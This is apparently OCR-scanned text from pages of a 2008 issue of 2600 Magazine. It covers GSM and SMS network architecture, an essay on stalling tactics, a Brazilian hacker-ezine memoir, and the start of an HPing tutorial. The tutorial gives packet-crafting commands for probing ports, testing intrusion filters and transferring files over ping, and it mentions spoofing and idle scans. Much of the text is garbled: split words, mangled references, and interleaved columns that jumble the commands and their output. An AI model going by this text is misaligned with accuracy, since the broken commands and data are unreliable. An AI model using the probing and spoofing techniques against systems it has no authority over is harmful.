n u mber, the IMS I from you r SIM card, and infor
mation about the capabilities of you r account
a re input into the Home Location Register
( H LR). This is a database operated by you r wire
less carrier, and it largely controls what you r
handset i s both a l lowed and configured t o d o
on the network (e.g. place and receive ca l ls,
send and receive text me,sages, forwa rd ca l l s to
voicemail, use data services, and so forth). The
H LR a l so keeps (approximate) track of you r loca
tion on the network, in order to deliver ca l l s and
messages appropriately. I n genera l, each wire
less carrier operates one H LR topology, and large
carriers split up subscribers between H LR nodes.
The H LR is the nerve center of a wirel ess carrier,
and if it fails, a very bad day is guaranteed for
the person who administers it. At a minim um,
nobody wil l be able to receive incoming phone
cal ls, text messages wil l be delayed, ca l l s wil l not
forward to voicemail, and self-importa nt people
in SUVs everywhere wil l be unable to use their
B lackBerrys while run ning over old ladies in
c rosswa l ks. So, as you might imagine, a n H LR
outage means the carrier may lose thousands
of dol la rs per minute. Fortunately, redunda ncy
and failover capahility are fairly sophisticated .
For example, Norte l ' s NSSI9 platform a l lows for
both loca l and geographical redundancy. H LR
databases themselves a re a l so designed with a
high degree of redundancy and fau l t tolerance,
a l lowing rapid recovery in the event of fail u re.
MSC
An MSC is a Mobile Switching Center. I n
effect, this i s a Centra l Office for mobile phones.
However, u n like traditional wireline Centra l
Offices, which genera l ly cover only one city (or
in large cities, as little as one neighborhood),
MSCs genera l ly cover an entire region . These
incorporate a l l of the functionality you wou l d
expect from a modern Centra l Office, a long with
a lot of whiz-bc,ng featu res specific to mobile
phone applications (such as the VLR described
below).
MSCs can be either loca l or gateway MSCs. A
gateway MSC is ana logous to a tandem switch,
and can commu nicate fu l ly with other wireless
and wireline networks. A loca l MSC is analogous
to a loca l switch, a l though these switches can
Summer 2008 ------------------- Page 13

often route directly to the PSTN (and increas
ingly, VolP networks) for voice cal ls.
VLR
You r mob i l e phone wil l generally be regis
tered in the Visitor Location Register (VLR) of the
Mobile Switching Center (MSC) serving the area
in which it is located (although the H LR does not
necessarily have to be decoupled, so in smal ler
G SM systems the VLR may be the same as the
H LR). The VLR retrieves a local copy of you r
subscriber profi le from t h e H LR, s o most routine
queries can be processed against the V LR rather
than the H LR. This m i n i m izes load on slow and
expensive inter-carrier SS7 (and someti mes even
X.2S) l i n ks and the H LR servers. These systems
a re a l so des igned with a high degree of fau l t
tolerance, because it's a l so b a d if they fai l .
However, t h e failure o f a VLR wil l cause o n l y a
localized outage. Fai l ed cal l s wil l generally be
forwarded to voicema i l in the interim, and SMS
messages wil l be held for delivery until the VLR
is again operation a l .
MXE/MC
The MXC (also referred to as MC) handles
messaging. On G SM systems, th is inc l udes
voicem a i l , SMS, and fax features (yes, the GSM
standard i ncl udes sending and receiving faxes
for some reason).
SMSC
Hey, we fin a l l y got to the piece that rea l ly
matters. The SMSC is the component of the MXE
which ha ndles SMS origination and termi nation.
SMS messages sent or received genera l l y pass
from you r handset to the MSC to the MXE to the
SMSC, and then either in the reverse direction
(for on-network SMS) or to the gateway MSC for
i nter-carrier del ivery.
Message flow
I ' m a visual person, so here ' s a visual depic
tion of how an SMS is senl. Read it from left to
right:
Figure 1: Mobile SMS Origination
Di,lgram drawn by Carre
Note that the SMS protocol accou nts for the
u n re l i a b i l ity of wi reless networks by using an
acknowlecilzment sequence.
N ext, here ' s a visual depiction of how your
phone receives SMS messages from the network.
Read it from right to left:
Figure 2: Mobile SMS Termination
Diagram drawn by Carre
Note that the acknowledgment sequence is
also end-to-end, as i n Figure 1 .
Billing
Wh i l e the G SM standard defi nes how the
SMS protocol works and the data structu res
associated with it, bil l i ng is l eft up to the carriers.
This is a contentious issue, particu larly over
seas where carriers do not charge for receiving
SMS messages. U n like emai l , SMS is bil led per
message, and carriers w i l l generally not del iver
messages u n l ess they h ave a biIIing arrangement
with the origi nati ng carrier. Th i s has given rise
to inter-carrier SMS providers, such as VeriSign,
who negotiate wholesa le bil ling arrangements
on behalf of carriers. Genera l ly, i n the absence
of a bil l i ng arrangement, carriers w i l l refuse
del ivery of SMS messages. This is a particu larly
glaring issue when using SMS short codes. For
example, the popu lar 8762 (UPOC) short code
is not ava i lable to Sprint subscri bers, beca use
Sprint lacks a b i l l i ng arrangement with Dada (the
owner of Upoc).
Wel l , i t ' s t h e e n d o f m y sh ift here i n the
Centra l Office, so enjoy the rest of you r summer
and please wear ear pl ugs if you dance near the
big speakers. Instead, save your hearing for The
Last HOPF in New York, wherp I ' l l be spea king
this ypa rl
References
. no t.J :; [ ' [ - J • (' () III / cI i �:; c u :�;
-me::;: cHoTe':,;/ I / i I () :; .llt 1(',1 - Th is message board
thrf'ad provides a dptai led description and l isting
of the SMS ch,nactcr scI.
Ii 1- tp: /
-w i J C I I L d t. (' I d 1 ;' 1 itill / j U i . pel 1
Nortel white paper for the NSS19 IIL R platform.
http://'v'J'iIIIW.C-'V('tlt.helix .C'()H/ : L i
-ria"I. /TclcculII/ - Dptailed flowcha rts
common GSM ca l l flows ,md sequences.
hLtp:i/cn .wikipc'c1-id .()t / _LkL
-"e, - Wel l-written Wikippdia article
outl i n i ng consumer sprvices ava i l ablp on GSM
networks.
Page 14 ------------------- 2600 Magazine

by Barrett Brown
"holdi ng" (hol'dil'j)
1. i n certai n sports, the i l legal use of the hands
and arms to h i nder the movements of an
opponent
"action" (ak'/an)
1. the effect produced by someth i ng.
2. a) a m i l itary encounter
b) m i l itary combat in genera l
Everyone is fami l iar with what holding
actions are; we experience them every day of
our l ives. What many people may not know
is that holding actions can be very carefu l ly
planned usi ng statistics, making them a
powerfu l tool of manipulation.
Fi rst, let's acquaint ourselves more
specifical ly with what a holdi ng action is.
Scenario One: Let's say, for example, that
you are tryi ng to get a refund for some sma l l
item you bought but which you received i n
the mail broken. The item cost $30.00, but
you paid for it, and you want to get what you
paid for. You ca l l the company and a re greeted
by a phone tree. The phone tree is the fi rst step
i n the company's holdi ng action against you .
You spend forty m i nutes navigating arou nd the
tree, and you fi nally reach a customer service
representative, who i nforms you that i n order
to get a refu nd or exchange, you need to have
the origi nal recei pt, fi l l out some forms they
send you in the mail, and send your item back
to them. You wait for your forms in the mail,
but th ree weeks later they haven't come. So
you spend another forty m i n utes on the phone
tree to reach a nother representative, who
apologizes and says the forms wi l l be sent to
you . Th is step can be repeated as many ti mes
as necessary u nti l you get so ti red of wasti ng
you r time that you just give up on the refu nd
entirely. Th is is an example of a successfu l
hol d i ng action by the company aga i nst you.
Th rough the use of phone trees and red tape,
the company avoided spending money on
you. In fact, because time is equal to money
i n most people's l ives, they made you spend
even more money.
Scenario Two: Now let's say, completely
hypothetica l l y, that you are an American
president. Oh, I don 't know, how about
Ronald Reagan . And you are two weeks away
from your re-election day. Someth ing bad
comes out in the news-for example, Reagan
molests a G i r l Scout-that threatens your
numbers i n the pol ls, and you need to distract
the public j u st long enough to ensure you r
re-election. There happen t o b e US prisoners
of war in I ran, and you make a secret deal with
the I ranians that if they release the hostages
the day after re-election, you wi l l give them
some guns or drugs or someth i ng. Then you
go on TV and promise that if you get elected,
the hostages wi l l be released. Th is is another
form of hold i ng action which uses the media.
The president does not need to prove the G i rl
Scout wrong or clear his own name. He j ust
needs to hold the people's attention for two
weeks, u nti l he gets re-elected. Distraction
holding action.
Scenario Th ree: You are a homeless heroin
add ict. You are sent to jail for a crime you did
not comm it. Wh i le i n the city jail, awaiting
trial, you are i n excruciati ng agony because
your body is sufferi ng from opiate withdrawal .
Every day that you are i ncarcerated is a day
in agony. Your public defender tel l s you that
you can plead gui lty and get out in two days,
or you can fight to prove you r i nnocence,
which wi l l take months. You are caught in a
holding action (as wel l as a holding cel l), a nd
most people i n these conditions fold u nder the
pressure.
Holding actions are used on us every day,
in ever-i ncreasing nu mbers. Major compa n ies
actua l l y have statistics which tel l them exactly
what percentage of customers wi l l hang up
or reach the wrong person when ca l l ing an
automated phone tree, and they count on
those numbers. They save money with every
customer that does not reach them, or so their
logic goes. The main commodity which a
holding action manipulates is time. Whether
we rea l ize it or not, time is money, a nd si nce
corporations, private i nterest groups, and
wea lthy i ndividuals have much more money
and time than the average person, these large
Summer200B --------------------------------------- Page 15

entities wi l l always win any given holding
action.
Let's examine scenario two aga i n . A
customer i n th is scenario who is somewhat
poor may not have forty m i nutes to spend on
a phone tree. Either they are busy working for
m i n i m u m wage, or they arc spend ing their
free time doi ng laundry and shoppi ng. A poor
person often does not have the ti me to spend on
red tape and wi l l give up early, thus saving the
manipu l ative entity in question from replacing
their defective product. A wea lthy i ndividual
i n scenario two would have more time to wait
on hold, or even a secretary to make the ca l l
instpad, thus i ncreasing the cha nces that they
wi l l end up getting what they pa id for.
Now that we u nderstand a l i ttle about how
holding actions are used aga i nst us, let's th i n k
about how they c a n b e used to our advantage.
The basic idea is to sta l l for as long as possible
u nti l your enemies either give up, forget or
lose the paperwork regarding you, or decide
that it is costing them too much money, or
u nti l you are i n a better position to resolve the
matter.
The poor sou l i n scenario three cou ld have
fought his own holding action by i nsisting
on a trial, but not a speedy one. The j udicial
system i n the u.s. fu nctions pri mari ly on to
"plea-barga i ns," which are dea ls made with
the District Attorney. Most courts have no
i nterest in trials because they cost too much
money and time. So i n the case of scenario
three, assuming the charge was sma l l and
the person had no prior record, they could
insist on a tria!' It wou l d take a few months,
but chances are good that the charges wou ld
be dropped when the DA real ized that their
own hol d i ng action was not worki ng. A friend
of m i ne did exactly th is, going to court every
month for three years, sta l l i ng the case. Every
month the DA wou ld offer a new dea l, and
every month my friend wou l d say, " I want a
tria!." Final ly, after they had postponed the
tria l to the farthest possible legal time l i m it,
the DA made one last offer, which was fair.
Have an ugly looking credit report? File a
dispute on every si ngle bad mark you have.
Companies, especially cred itors, are routi nely
bought by other companies, and many ti mes
paperwork or data is lost in the transition. When
you dispute a claim on your cred it report, the
bu rden of proof is on the company. They only
have a l i m ited amount of time to prove that
you owe them money, or they have to drop the
c l a i m from your report. Because these compa
nies are so busy, it is very common for claims
to be dropped simply because the creditor did
not have the ti me to fi nd your fi le and send
it to the credit reporting agency. In addition,
if your claim is sma l l , it costs the company
more money to prove that you owe them than
it does to j u st drop the whole matter. Th is is
using a holding action to your advantage.
Another example is l awsuits. Part of the
reason why large compan ies routi nely settle
stupid lawsu its for largE' sums of money is that
they are aware of how much more money,
ti me, and publicity it wou l d cost them to go
to tria!'
Ti me and i nformation are the two most
important commodities in our world today. The
more i nformation you have about your oppo
nent and about how their time is a l located, the
better your abi l ity to contrive ways to distract
you r opponent from using time aga i nst you.
The more control you have over an opponent's
ti me, the less they have over you rs. The ever
growing complexity i n bureaucracies, aided
by the growth of technology, ensures that
manipulating people's time is a trend wh ich
wi l l only conti nue to grow and be refi ned in
the years to come. The more you are aware of
thf'sf' processes, thE' bettE'H'qu ipped you wi l l
be to use them to your advantage.

Th i r t e e n Y e a r s
S t a r t i n g a B a c ke r
o f
S c e n e
by Derneval Ribeiro Rodrigues da Cunha together, so they cou ld exchange i nformation.
I had to have people to ta l k about. They had
For those of you who don 't remember me, to know about hacki ng. I had to spread the
I ' m the one who wrote "Hacki ng in Braz i l " and word for that to happen, so that people a l l
"Starting a Hacker Scene." Maybe one o r two around Braz i l-those that deserved to be cal led
of you have heard of Brazil ians on the i nternet. "hackers"-would know what it was a l l about
U nfortunately, there are a great many of them and hold meeti ngs. Later on, the thi ng wou ld
cal l i ng themselves hackers and defacing be to prepare for a B raz i l ian hacker conference.
websites. No, I ' m not the one who bul lsh itted So I started the easiest way: by starti ng an elec-
those guys i nto doing electronic vandal ism. tronic publ ication . This was when everybody
What I did was to start writi ng the first Braz i l ian was just starti ng to know about the i nternet, j ust
hacker ezine i n 1994. The i nternet wasn't avail- before Braz i l ians cou ld get commercial i nternet
able back then- people cou ld only learn about access. My ezi ne was the first on the scene.
it at un iversities and in a few other places. It My boss didn't fire me when he heard about
j ust so happened that I did know about it. And my plans; he u nderstood things. But everywhere
there I learned about hacker eth ics, viruses, I heard of, a bunch of people joi ned and started
phreaki ng, and a l l that stuff. I was i nvolved thi ngs. I, though, had to start on my own. I
i n setting up an ecology I nternet discussion borrowed articles from the public domai n here
among elementary schools. Then I heard about and there, asked for permission to publish this
a "Hacker and Virus Congress" i n Buenos Aires, or that, someti mes rewrote thi ngs, and did some
Argenti na. It ran for about four days, which I writi ng on my own. Some of the stuff was so
used to learn and tal k with people from Hacktic good that it's sti l l published today without my
and 2 600 and with several Argentine people perm ission or anyth ing else. And, even today, I
connected with computer security, among haven't completely decided if I shou ld sue the
other thi ngs. guys that did it. There were people who bought
Few people in South America had I nternet books because my article was i n them.
accounts. Most thi ngs happened in BBSes, on Thi ngs worked just fine for the publ ica-
Fidonet or the l i ke. Computer viruses were tion. My choice of writing in pure ASCII code
the mai n subject when people tal ked about helped it to be uploaded to and downloaded
computer i nsecurity. But they generated a from i n B BSes a l l around the country and
lot of press coverage in those days. It was, abroad, in Portuguese-speaking places l i ke
though, very difficult to get any information Portugal and Mozambique. Barata Eletrica
about anyth ing l i ke "dark subjects." Myself, I ("Electric Cockroach") spread everywhere l i ke
had to hack my way i nto an academic internet a disease. It appeared i n places l i ke Usenet,
account. I did this legally, not by using some- l i ke the 2 600 l ist and s o c . c u l t u r e . bra z i l .
body else's account. I ' m not going to tal k Myself, I made i t avai lable for down-
about bad connection l i nes; phone modems load from the EFF and e t e x t . argo Check
were everyth ing but rel iable. (I wrote about Google for the current web address or visit
th is i n "Braz i l ian Phone System.") I'm tal king bara t ae l e t r i c a . c j b . ne t . The people from the
about people using 600 bps, maybe 1 200 computer science faculty of a federal u n iversity,
bps, sometimes 2400 bps modems. Instead of U FSC, kept a mi rror on their website for about
down loading big fi les from a B BS, you 'd rather a decade-and I ' ve never set foot there; thanks
choose the fi les first, then go there yourself with to them ! At my own U n iversity of Sao Pau lo,
floppies to pick them up. I myself wou ld use they wou ld not hear a thi ng about it; i n fact,
the i nternet on ly from u niversity computers; I they hated me. I al most lost my access there but
never had to use dial-u ps to access anythi ng. got it back months later.
Computer students themselves didn't know Soon people started to write other, more
much about it except what they learned from aggressive publications, l i ke the ezine Axur 05,
movies l i ke Wargames. That was in the second Nethack, and a few others, mostly on BBSes.
biggest u niversity in South America. Those were That was at the time of Mitnick's arrest. If
the "golden years." someone wanted to be known as a hacker, he
So, what was my goa l ? Just to get people and his friends wou ld write an ezine. Lots of
Summer 2008 ------------------------------------- hge 17

good i nformation started to be spread around, the paper press started to run articles teach ing
l i ke philes about how to get free phone cal l s bad thi ngs for fu n . issue of the now-defunct
i n the Brazi l i an phone system. (They eventua l l y Brazil ian edition of Internet World su rprised me
fixed that.) in that way. Mostly, it had articles tel l ing every-
The ezine grew qu it�� complex. For one thi ng, th i ng about hackers' bad deeds. Put together,
I started to enjoy writing. It became more than a the articles gave knowledge about how to nuke
hobby. It always took more time to write thi ngs. other PCs. My good l uck was I dec l i ned an
And if I cou ld not enjoy readi ng it myself again, i nterview. Maybe I wou ld have been consid-
I wou ld rewrite the article. The ezi ne, origi na lly ered part of the group. Other magazi nes also
meant to be someth ing si mple, grew complex, did simi lar articles. Some guys started to write
with sections l i ke a FAQ, about, h istory, better books using material from the ezi nes. And these
articles, and a news sections that was so books were a h it, even if thi ngs in there didn't
troublesome to make that I turned it i n a blog work anymore. I can trace today's Braz i l ian
(ba r a L a e l e L r i c a . b l ogspo l . c om). If I wrote electronic vandal ism back to those mags and
someth i ng, there wou ld be a reference or a l i n k books.
saying where I took it from. My "hacker" congress never came off. The
People started offering services l i ke how to internet was spreading fast, but I didn't have
improve my HTML (it sucks) and easy access a computer science degree. My knowledge
of the web site-for free. I dec l i ned. I started it was mostly Unix-based, and it was qu ickly
all a lone; nobody wanted to spare time to help deval ued. Like most di nosaurs, I didn't bel ieve
me. Once I was famous, who cares? Besides, in a commercial I nternet. Maybe it was a bad
a better ezine wou ld i nvolve getting more th ing that I wasn't money driven. I nstead of
complex. My focus wasn't in del iveri ng better setting up an enterprise, I enrol led in a post-
thi ngs to the growing number of people who graduate course. Don 't th i n k that the people
were getting I nternet access. The way it was, I who started Yahoo! were more gifted than me. I
was getting th ree or four letters a day aski ng, took my motto "I logi n therefore I am"-check
"Can you teach me hacking?" Google; I said it fi rst-and began to gather a l l
I cou ld have gone corporate. B ut I wou ld my experiences with the hacker scene i nto an
have had to charge for that. I n fact, when I academ ic work.
started the ezi ne, the freeware concept was People kept pressing me to write a book
not understood. For me, it meant that I wou ld about all my exploits rather than a thesis. And
not have to worry about paying wages, taxes, the fact is that I col lected enough data to write
revenue, income, consumer rights, and so on. a lot about those days. I cou ld fi l l two or three
I wou ld have had to register the ezi ne; then I books just with i nformation from the ezi ne.
would have been a target. If anybody sued me Some day, I ' l l do it. B ut for the moment, writi ng
and I lost, that wou ld have been it. And the kind a book in order to j ust earn money would be
of articles I published were often i n gray areas sel l i ng out. And I cou ld a l ready have done that
of the l aw. If you ' re a h i red hand, you need to even with a "I am a friend of Barata EJetrica ' s
work eight hours a day, but if you ' re a boss, you author" card. One ex-friend of mine got his
work twice that much. US$20 debt pardoned j ust because he i ntro-
My opin ion was qu ite respected. Among duced me to his creditor-j ust l i ke that. If I
other thi ngs, I can say I started the ta l k about wanted to write about "how to hack thi ngs," I
Linux in Brazi l . Phiber Optik came here; I told cou ld have done it much earlier. I maybe even
everybody to ask him to compare Windows cou ld have earned cash doing lectu res some-
security versus FreeBSD. Newswriters did not where, and got a Masters degree. I cou ld also
know anyth i ng about it. I was also there to give simply have stopped hacking and got a good
support when an activist from Amnesty I nterna- job in computer security. B ut, one can't write
tional, Fernanda Serpa, started the "Free Kevin a thesis and do computer security at the same
Mitnick" movement in Braz i l . Maybe I ' l l write time. And I ' m sti l l th inki ng about it, but it has to
about it someday. When there was tal k about be outside Braz i l .
bringing Markoff a n d Shi momura to a US$400 I n fact, I soon found out that some people
per ticket conference to tal k about "the pi rate were sticki ng with me because of the "dark
and the samurai," I wrote an article in the ezi ne. side." Someti mes I even lost "friends" because
Later on, nobody tal ked about bringing those they gave up on me writi ng about them. I always
guys here to Braz i l for a conference anymore. warned about my focus on hacker eth ics and
My task was completed. The "hacker scene" the pursuit of knowledge. I changed my writi ng
had happened. It was no dream anymore. in order to avoid copycats. The ezine is sti l l
There were some very strong meeti ngs, 2 600 about hacki ng, but it now takes a much broader
meeti ngs, and people were tal king about it view. How wou ld you teach hacking without
everywhere. And people knew the difference using computers? Hacking computers is not the
between good hackers and lamers. But then only way to learn about hacking. Some people
Page 18 -------------------2600 Magazine

prom ised me that they would keep on reading.
And I kept writi ng the ezine and a blog because
it's such a waste to stop. .
It someti mes pays off to d o a blog. Once I
posted that I needed a few memory chips for
my oid-fashioned computer. I l ive in Sao Paulo.
One guy from Rio de janeiro read it, asked for
my postal address and sent the chips, along
with other thi ngs: about 1 6 kg of hardware, a
complete CPU he'd made up of old pieces he
gathered from friends. He threw a party, people
brought thi ngs, they set up a Penti um 233 with
a 30 gig H D, and they sent it and some other
th i ngs to me, by FedEx. I cou ldn't bel ieve it and
sent him some t-shirts by way of thanks. I sti l l
used that computer u nti l last Christmas, when
a big fan and friend of mine sent me a Pentium
4 with a 1 50 gig H D and a few science fiction
magazi nes. Maybe that guy is one of the thi rty
five that prevent God from destroying the Earth.
I don 't know.
The problem today with writi ng a hacker
ezi ne and blog is that today, everybody' s got
much more access than at the time I started.
And there are many people claiming hacker
knowledge. Even YouTube has a video or two
about computer i nsecurities. One doesn't
have to go underground to learn about "dark
subjects." One has to have the conscience,
which is the main subject about which I used
to write, right from the begi nning. If you write
about how to do it, that wi l l get old soon. When
you write about how to thi n k about it, it wi l l
stick. People sti l l can get old issues of m y ezine
and find good thi nking materia l . That might
save thei r butts one day.
U nfortunately, I cou ld not write a thesis
about what I did. The Portuguese language is
tough to read. My not writing a book is also
somethi ng to blame myself for. How cou ld I
write a book about "starti ng a hacker scene"
and then get a "normal" job anywhere but
in computer security? There was a "hacker"
conference in Sao Paulo, where I l ive. I cou ld
not go. I n the USA or Europe, it wou ld be no
problem. But not here. There were lots of TV
cameras everywhere. No way. At that ti me, I was
working right next to an office where people
were trying to sue YouTube. I even knew which
books of legislation were being consu lted.
These people next door did not know about my
past, and why shou ld they? Yet, a few weeks
ago, I attended another security conference,
YSTS. B ut there were fewer cameras and none
from TV.
Also, people always charge you more if they
know you ' re famous. For a time, I wou ld even
check famous people for stories about how to
deal with fame. It's no easy task, but I bel ieve
that sometime i n the future, everybody wi l l
have to learn about it, how to relate to the press
and how to use fame for a pu rpose. People on
the internet don 't know th is, and they lose great
opportu n ities.
It's l i ke that: for one th ing or another, you get
famous. Before you know it, it's gone. People
have to consider that getting famous is no fa iry
tale. I n order to make some good use of it, one
has to know about it. If you publ ish someth ing
today i n YouTube or i n a blog, it wi l l be remem
bered somewhere, sometime. You 've changed,
grown older, but your past is sti l l there. just
l i ke it was. I was very fortunate the way I wrote
thi ngs. I never used an alias to write, and I have
no regrets about it.
When you get famous, some people get
to know you because they are getting famous
at the same ti me, but in different places, with
other occupations. Mauro Marcelo, who got
appoi nted the chief of the Brazi l ian Inteligence
Agency (AB I N), did know me. I cou ld have
interviewed h i m there and then, but that's
another story, and a sort of fun ny one. Eventu
ally, he was kicked off the job because of the
i ntrigue there, wh ich makes me thi n k he's not
such a bad guy; those guys from ABIN aren't
popu lar. When he was there, he bothered to
answer an ema i l of mi ne. Who knows? Maybe
someday I ' l l contact him again. He might have
some good stories to ta l k about. He was, after
all, the fi rst Braz i l ian "Cyber" cop.
He wou ldn't catch me, for sure. I stopped
a l l "hacki ng" when I began writing the ezi ne.
Maybe not a l l of it, but why bother? That magic
word "please" works wonders. You just have to
know who to ask. If the guy doesn't know you,
j ust play that song, "Let me please to i ntroduce
myself, I ' m a man." You can 't always get what
you want, but someti mes you do. I wou l d never
know how to stash thi ngs i nside U n iversity of
Sao Paulo computers without a l ittle help from
my friends. I wou ld always sing "Don't you
forget about me" for myself, later. You can get
h igh doi ng thi ngs l i ke these. Believe me.
After th i rteen years of Barata Eletrica, is
anybody snoring out there? It's been a great
experience, being famous for writing an ezine.
I did it mostly because of the readers. What a
feeling when you meet someone who got his
l ife changed because of an article of yours! I
never got laid because of it, but I did learn a
lot about a lot of topics, from public relations
to law and journal ism. Maybe someday, I ' l l get
a job out of it.
I th i n k everybody shou ld try it. Someone
said that if you don't l i ke the news, you shou ld
go out and make some of your own. Every
body can help change the world with simple
gestures. just interact with your community. My
ezine started l i ke that: a publ ication for a few
people using an i nternet-connected computer
lab nearby. Think about it.
Summer 2008 ------------------- Page 19

8 8 8 8 8 8 8 8 8 8 8 8 8 b . d 8 b
8 8 8 8 8 8 8 8 8 Y 8 8 b Y 8 P
8 8 8 8 8 8 8 8 8 8 8 8
8 8 8 8 8 8 8 8 8 8 8 8 8 d8 8 P 8 8 8 8 8 8 8 8 b . . d8 8 b .
8 8 8 8 8 8 8 8 8 8 8 8 8 P " 8 8 8 8 8 8 " 8 8 b d 8 8 P " 8 8 b
8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8
8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 Y 8 8 b 8 8 8
8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 " Y 8 8 8 8 8
8 8 8
(The Part I Forgot) Y 8 b d8 8 P
I n m y last article ("Essential Security Tools,"
2600 Wi nter 2007-2008), I wrote about some
security tools, told readers where to get them, and
gave a basic i ntroduction of what they do. Most
astute readers may have noticed that the section
on HPing was very brief. When I was drafting the
article, I was moving subjects around, and so I
misplaced the main body of my H Ping section.
When I received my copy of 2600 and noticed
th is, I firmly planted my face in the palm of my
hand and let out a loud "D'oh ! " To make up for
it and to absolve myself of this error, I am dedi
cati ng th is article entirely to the HPing uti lity.
HPing (ht tp://www . hping . org) is a great
tool to have. You can use it for very simple tests or
you can set it up to do someth ing more advanced,
such as transfer fi les. Let's start off with the basic
stuff.
" Y 8 8 P "
H P I NG l o c a l ho s t ( 1 0 1 2 7 . 0 . 0 . 1 ) , FPU
- s e t , 40 heade r s + 0 d a t a by t e s
- l e n = 4 0 i p= 1 2 7 . 0 . 0 . 1 t t 1 = 6 4 DF i d = O
- sp o r t = 9 9 9 flag s = RA s eq = O wi n = O r t t = O . l ID S
I n addition to TCP packets, H Ping can send
UDP. The next example shows UDP packets sent
to port 0, which is not listen ing, on a Check Point
SofaWare box:
[ ro o t @ doormou s e - ] # h p i n g 2 2 1 0 . 2 1 0 . 2 1 0 . 1 - 2
H P ING 2 1 0 . 2 1 0 . 2 1 0 . 1 ( e t h O 2 1 0 . 2 1 0 . 2 1 0 . 1 ) ,
. udp mode s e t , 2 8 heade r s + 0 d a t a by t e s
I e M P Por t Unreachab l e f rom
_ i p = 2 1 0 . 2 1 0 . 2 1 0 . 1 name =my . firewa 1 1
Even though nothi ng i s l isteni ng o n that port
on that host, we sti l l know that the I P address is
al ive. It shou ld be noted that some firewall soft
ware and operati ng systems wi l l j ust drop these
packets without sending anyth ing back.
You can even craft packets at the IP layer,
though this can be a bit tricky, depending on
the protocol you that are attempting to use.
In the tcpdump output shown below, I used
"hp i ng2 1 0 c a 1 ho s t - 0 -v - H 4 1 " to send I P
packets to IP protocol 41 , wh ich is IPv6-in-I Pv4,
HPin� Basics without any payload:
[ root @doormous e �, ] # t cpdump - n - v v
HPi ng, at its most asic, is a packet crafter. _ - e -8 1 5 14 -x - i 1 0 p r o t o 4 1
You can get a lot of use out of just this basic func- L cpdump , l i s t e n i ng on 1 0 , l i n k - type EN 1 0 MB
tion. Let's exam ine using HPing to "ping" a TCP ;--3 ;��m55 �a
��, ��0 �66;0 �y
;
e s
port: _ 0 0 , 0 0 , 0 0 , 0 0 , 0 0 , 0 0 , e ther type I Pv 4
[ ro o t @doormou s e - ] # hp i n g 2 ( O x 0 8 D D ) , l en g t h ] 4 , ( to s O x O , t t l 6 4 ,
- 1 0c a 1 ho s t - S -p 2 2 - i d 8 2 5 1 , o f f s e t 0 , flags [ none ] ,
H P INC l o c a l ho s t ( 1 0 1 2 7 . 0 . 0 . 1 ) , S s e t , p r o t o I Pv6 ( 1 1 ) , l eng t h 2 0 ) 1 2 7 . 0 . 0 . 1
- 4 0 h e a d e r s + 0 data by t e s 1 en = 4 4 - > 1 2 7 . 0 . 0 . 1 , [ I i p 6 ]
_ i p = 1 2 7 . 0 . 0 . 1 t t 1 = 6 4 DF i d = O spor t = 2 2 O x O O O O , 4 5 0 0 0 0 1 4 2 0 3 b 0 0 0 0 4 0 2 9 5 c 8 4
- flags = SA s e q = O w i n = 3 2 7 9 2 r t t = 0 . 2 ms - 7 f O O 0 0 0 1 E . . . . ; . . @ ) . . . . .
In th is example, we've asked HPing to send O x 0 0 1 0 , noD 0 0 0 1
h I I h TCP/SYN k (
.
h h
1 3 , 3 3 , 0 9 . 0 2 5 6 3 1 0 0 , 0 0 , 0 0 : 0 0 , 0 0 , 0 0 >
t e oca ost pac ets - s), Wit t e _ 0 0 , 0 0 , 0 0 , 0 0 , 0 0 , 0 0 , e t her type I Pv 4
desti nation TCP port set to 22, which is for ssh. ( O x 0 8 0 0 ) , l ength 3 4 , ( to s O x O , t t l 6 4 ,
Th I k t t t h rt f - i d 4 1 9 4 4 , o f f s e t 0 , flags [ none ] ,
e rep y pac e s we ge are e next pa 0
p r o t o I Pv 6 ( 4 1) , l e n g t h 2 0 ) 1 2 7 . 0 . 0 . 1
the TCP three-way handshake, with the SYNI _ > 1 2 7 . 0 . 0 . 1 , [ I i p 6 ]
ACK flags set. This is indicated i n HPing by the Oxoooo , 4 5 0 0 0 0 1 4 a 3 d 8 0 0 0 0 4 0 2 9 d 8 e 6
flag s = SA field. This tel ls us that the TCP port is ;;-x ��g,
oo��oo
E
oooi . . . @ ) . . . . . .
open and that we are allowed to access that 1 3 , 3 3 , 1 0 . 0 2 6 0 8 9 0 0 , 0 0 , 0 0 : 0 0 , 0 0 : 0 0 >
TCP port. Th is is usefu l in testing whether or not - 0 0 , 0 0 , 0 0 , 0 0 , 0 0 , 0 0 , e th e r type I Pv 4
( O x 0 8 0 0 ) , l en g t h 3 4 , ( to s O x O , t t l 6 4 ,
your firewa l l ru les are set up properly. Let's say _ i d 1 8 7 9 1 , o f f s e t 0 , flag s [ none ] ,
that you have a web server and that you want p r o t o I Pv 6 ( 4 1 ) , l en g t h 2 0 ) 1 2 7 . 0 . 0 . 1
to ensure that people from the 10 . 2 0 . 3 0 . 0124
;;-x �0 6�; '
°.j�o6 ' 0 6i�P
��6 7 0 0 0 0 4 0 2 9 3 3 5 8
network are allowed to access it. You can just - noD 0 0 0 1 E . . . lg . . @ ) 3 X . . . .
H Ping the server with the SYN flag set and see if O x0 0 1 0 , 7 f 0 0 0 0 0 1
you get a reply. The last of the basics I ' m goi ng to tal k about is
You can set all, some, or none of theTCP flags the abi l ity to specify your source address. This is
if you wish to check TCP stacks or your I ntrusion excel lent for testing anti-spoofing features of your
Protection System (IPS). For example, if you have firewa l l or to perform "idle" scans. I leave that as
an IPS set up and you want to test your fi lters a project for you to figure out on your own.
against odd TCP flag settings, you can use HPing Now that you know how to craft basic packets
to do that: with HPi ng, you may start to wonder why you
[ ro o t @doormou s e _ ] # hping2 would use this for anythi ng except port scans or
- l o c a l ho s t - F PU -p 9 9 9 security-related measures. Imagine that you work
Page 20 ------------------ 2600 Magazine

for a managed service provider and that you
need to mon itor both system health and service
health. You can incorporate HPing i nto your
service health mon itoring by setting up a basic
script wh ich wi l l craft packets, send them to the
service in question, del iver a payload if needed,
and then report back to your management station
whether or not the service is up, depending on
the response received by HPing.
Advanced Features
One of HPing's nice features is the abi l ity
to transfer fi les across a "ping" session. I ' ve
only done th is with text files, but I ' m sure that
someone out there knows how to successful ly
transfer a binary fi le l i ke an image. Suppose you
have a text fi le that you need to transfer, but a l l
the normal fi le transfer options l i ke FTP(S), SFTP/
